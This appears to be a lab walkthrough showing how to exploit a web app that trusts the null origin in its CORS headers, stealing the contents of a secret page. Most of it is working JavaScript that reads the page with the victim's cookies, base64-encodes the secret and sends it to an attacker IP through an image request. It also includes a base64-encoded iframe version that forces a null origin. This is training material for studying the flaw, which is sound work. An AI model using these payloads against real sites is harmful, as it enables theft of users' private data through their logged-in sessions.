Null Origin Exploitation

Objective: Exploit the vulnerable application to perform Null Origin exploitation and steal the contents of the secret page.

Logging into the web app with the supplied credentials loads a page secret.php.

Viewing the access control headers show that the website trust the sites having null origin and can also access the cookies stored in the browser for demo.ine.local. This means that either the local file or an iframe can read the secret.

Create a HTML file with the below code.

<html>
    <head>
        <script>
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                if (xhr.readyState == XMLHttpRequest.DONE) {
                    var r = xhr.responseText;
                    console.log(r);
                    var d = btoa(r.split('<div class="my-4 text-2xl">')[1].split('</div>')[0].trim());
                    function steal() {
                        document.write('<img src="http://192.223.79.2:54321/' + d + '"/>');
                    }
                    steal();
               }
            }
            xhr.open('GET', 'http://demo.ine.local/secret.php', true);
            xhr.withCredentials = true;
            xhr.send();
        </script>
    </head>
</html>

Observe the connection in netcat with the secret in base64.

But in a more realistic scenario, the payload will be hosted on another sever. Becuase of the SOP, the response cannot be read. But if the request is in an iframe, then it will satisfy the condition.

<script>
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE) {
            var r = xhr.responseText;
            console.log(r);
            var d = btoa(r.split('<div class="my-4 text-2xl">')[1].split('</div>')[0].trim());
            function steal() {
                document.write('<img src="http://192.190.158.2:54321/' + d + '"/>');
            }
            steal();
       }
    }
    xhr.open('GET', 'http://demo.ine.local/secret.php', true);
    xhr.withCredentials = true;
    xhr.send();
</script>

Base64 encode the above payload.

File contets will look like the below code:

<html>
  <head>
    <iframe src="data:text/html;base64,PHNjcmlwdD4KICAgIHZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKICAgIHhoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHsKICAgICAgICBpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSkgewogICAgICAgICAgICB2YXIgciA9IHhoci5yZXNwb25zZVRleHQ7CiAgICAgICAgICAgIGNvbnNvbGUubG9nKHIpOwogICAgICAgICAgICB2YXIgZCA9IGJ0b2Eoci5zcGxpdCgnPGRpdiBjbGFzcz0ibXktNCB0ZXh0LTJ4bCI+JylbMV0uc3BsaXQoJzwvZGl2PicpWzBdLnRyaW0oKSk7CiAgICAgICAgICAgIGZ1bmN0aW9uIHN0ZWFsKCkgewogICAgICAgICAgICAgICAgZG9jdW1lbnQud3JpdGUoJzxpbWcgc3JjPSJodHRwOi8vMTkyLjE5MC4xNTguMjo1NDMyMS8nICsgZCArICciLz4nKTsKICAgICAgICAgICAgfQogICAgICAgICAgICBzdGVhbCgpOwogICAgICAgfQogICAgfQogICAgeGhyLm9wZW4oJ0dFVCcsICdodHRwOi8vZGVtby5pbmUubG9jYWwvc2VjcmV0LnBocCcsIHRydWUpOwogICAgeGhyLndpdGhDcmVkZW50aWFscyA9IHRydWU7CiAgICB4aHIuc2VuZCgpOwo8L3NjcmlwdD4K"></iframe>
  </head>
</html>

Now the secret will be sent.

Decode the value to get the secret.